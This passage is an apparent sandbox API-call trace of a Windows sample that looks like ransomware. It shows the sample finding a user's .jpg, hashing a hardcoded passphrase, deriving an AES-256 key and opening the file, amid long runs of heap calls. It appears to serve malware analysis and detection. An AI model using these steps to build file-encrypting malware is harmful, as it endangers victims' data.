hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0093.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0093.921] CloseHandle (hObject=0x258) returned 1 [0093.921] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.921] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0093.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3fff20, ftCreationTime.dwHighDateTime=0x1d5f02d, ftLastAccessTime.dwLowDateTime=0x3197eae0, ftLastAccessTime.dwHighDateTime=0x1d5ee7d, ftLastWriteTime.dwLowDateTime=0x3197eae0, ftLastWriteTime.dwHighDateTime=0x1d5ee7d, nFileSizeHigh=0x0, nFileSizeLow=0x244f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="fgq5EW8t8.jpg", cAlternateFileName="FGQ5EW~1.JPG")) returned 0x41ac440 [0093.921] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0093.922] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.922] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0093.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0093.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0093.922] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.923] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0093.923] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.923] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0093.924] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.924] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0093.924] CryptHashData (hHash=0x41ac740, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0093.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.925] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0093.925] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0093.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0093.973] CryptDestroyHash (hHash=0x41ac740) returned 1 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0093.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0093.974] TranslateMessage (lpMsg=0x144eb54) returned 0 [0093.974] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0093.974] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0093.974] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0093.974] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0093.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0093.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0093.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0093.977] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0093.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0093.977] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0093.978] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0093.978] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.978] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\fgq5ew8t8.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0093.979] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.979] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, 